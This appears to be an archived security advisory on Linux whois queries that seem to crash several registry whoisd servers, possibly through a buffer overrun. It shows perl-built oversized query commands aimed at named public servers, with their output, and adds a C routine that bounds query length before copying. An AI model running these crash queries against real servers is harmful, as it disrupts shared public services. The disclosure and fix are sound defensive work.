COMMAND

    whois

SYSTEMS AFFECTED

    Linux

PROBLEM

    Michal Zalewski found the following.  In the following example (which
    works only with the Linux version of the 'whois' command - the *BSD
    version has built-in query size limits), replace joshua.ripe.net with
    your favourite - whois.arin.net or whois.radb.net...

        [lcamtuf@www lcamtuf]$ whois `perl -e '{print "0." x 10000}'`@joshua.ripe.net
        [joshua.ripe.net]

        % Rights restricted by copyright. See http://www.ripe.net/ripencc/pub-services/db/copyright.html
        % No entries found for the selected source(s).
        %
        % If you would like to search on arbitrary strings,
        % please see the Database page on the RIPE NCC
        % web-site at http://www.ripe.net/ripencc/pub-services/db/
        % This will only work for RIPE data.
        %
        % Please note that RIPE whoisd service temporarily
        % does not mirror RADB and CW databases. Please query
        % these databases directly at:
        % whois.radb.net for RADB and
        % whois.cw.net for CW.

        [lcamtuf@www lcamtuf]$ whois `perl -e '{print "0." x 20000}'`@joshua.ripe.net
        [joshua.ripe.net]

        % Rights restricted by copyright. See http://www.ripe.net/ripencc/pub-services/db/copyright.html
        [lcamtuf@www lcamtuf]$

    For whois.arin.net  and whois.radb.net,  the 'magic  point' is  at
    about 248 bytes of query sent. whois.ripe.net seems to panic  with
    buffer larger  than 30k,  but only  with specific  sequences (like
    "0.0.0"...).  whois.cw.net can stand even 80-90kB before  crashing
    sessions.  InterNIC seems to   have similar problems as our  other
    Big Friends...

        [root@nimue:4 lcamtuf]# whois `perl -e '{print ".0" x 250}'`@rs.internic.net
        [rs.internic.net]

        Whois Server Version 1.1

        Domain names in the .com, .net, and .org domains can now be registered
        with many different competing registrars. Go to http://www.internic.net
        for detailed information.

        No match for nameserver
        "0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.
        0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0".

        >>> Last update of whois database: Wed, 2 Feb 00 02:26:48 EST <<<

        The Registry database contains ONLY .COM, .NET, .ORG, .EDU domains and Registrars.

        [root@nimue:4 lcamtuf]# whois `perl -e '{print ".0" x 260}'`@rs.internic.net
        [rs.internic.net]

        Whois Server Version 1.1
        [root@nimue:4 lcamtuf]#

    No idea how to explain it - it looks just like a regular buffer overrun
    in whoisd started from inetd (as is suggested).  But, of course, since
    we can't get the sources of the currently running services, it could
    also be described as "silent dropping of excessive data portions with
    a system-dependent data amount limit".  Only one thing is mysterious -
    the whoisd service produces verbose output on any query syntax error
    or any other problem, except for this one.  And the RFC doesn't
    mention a maximal query length nor _any_ situation in which the
    connection should be silently dropped.  That's another reason to
    think whoisd crashed.
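    The following is an added illustration, not code from the advisory or
    from any real whoisd: a bounded query reader of the kind an
    inetd-started daemon could apply before copying the query into a
    fixed buffer.  It rejects an oversized line with the verbose "%" style
    error the text notes is missing, instead of overrunning a buffer or
    silently dropping the connection.  The 1024-byte limit, the function
    names and the sample inputs are all assumptions made for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed limit for this example; the whois RFCs define no maximum. */
#define WHOIS_QUERY_MAX 1024

enum whois_status {
    WHOIS_OK = 0,
    WHOIS_EMPTY,
    WHOIS_TOO_LONG,
    WHOIS_BAD_CHAR
};

/* Copies the first line of 'raw' (len bytes as received on the socket)
 * into 'out', or writes a "% ..." explanation into 'out' and returns a
 * non-zero status.  The length check runs before any byte is copied,
 * so an oversized query can never overrun 'out'. */
enum whois_status whois_read_query(const char *raw, size_t len,
                                   char *out, size_t out_cap)
{
    size_t n = 0, i;

    /* the query ends at CR or LF; anything after it is ignored */
    while (n < len && raw[n] != '\r' && raw[n] != '\n')
        n++;

    if (n > WHOIS_QUERY_MAX || n + 1 > out_cap) {
        snprintf(out, out_cap, "%% Query too long (%zu bytes, limit %d)",
                 n, WHOIS_QUERY_MAX);
        return WHOIS_TOO_LONG;
    }
    if (n == 0) {
        snprintf(out, out_cap, "%% Empty query");
        return WHOIS_EMPTY;
    }
    for (i = 0; i < n; i++) {
        if (!isprint((unsigned char)raw[i])) {
            snprintf(out, out_cap, "%% Non-printable byte at offset %zu", i);
            return WHOIS_BAD_CHAR;
        }
    }
    memcpy(out, raw, n);
    out[n] = '\0';
    return WHOIS_OK;
}

/* Convenience wrappers sharing one static result buffer, so a caller
 * can check a literal or a repeated pattern and read the message back. */
static char last_out[WHOIS_QUERY_MAX + 1];

const char *whois_last_message(void) { return last_out; }

enum whois_status whois_check_string(const char *s)
{
    return whois_read_query(s, strlen(s), last_out, sizeof last_out);
}

/* Builds 'unit' repeated 'times' times followed by CRLF (constructed
 * input shaped like the queries above) and classifies it. */
enum whois_status whois_check_repeated(const char *unit, size_t times)
{
    size_t ulen = strlen(unit), total = ulen * times + 2, i;
    char *buf = malloc(total + 1);
    enum whois_status st;

    if (buf == NULL)
        return WHOIS_TOO_LONG;   /* treat allocation failure as rejection */
    for (i = 0; i < times; i++)
        memcpy(buf + i * ulen, unit, ulen);
    memcpy(buf + ulen * times, "\r\n", 2);
    buf[total] = '\0';
    st = whois_read_query(buf, total, last_out, sizeof last_out);
    free(buf);
    return st;
}

int main(void)
{
    enum whois_status st = whois_check_repeated("0.", 10000);
    printf("20000-byte query -> status %d: %s\n", (int)st, whois_last_message());
    st = whois_check_string("example.net\r\n");
    printf("normal query     -> status %d: %s\n", (int)st, whois_last_message());
    return 0;
}
```

    The point of the ordering is that the length is measured on the
    received bytes and compared against the buffer capacity before
    memcpy runs; a daemon that copies first and checks afterwards has
    already lost, whatever limit it advertises.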

SOLUTION

    Nothing yet.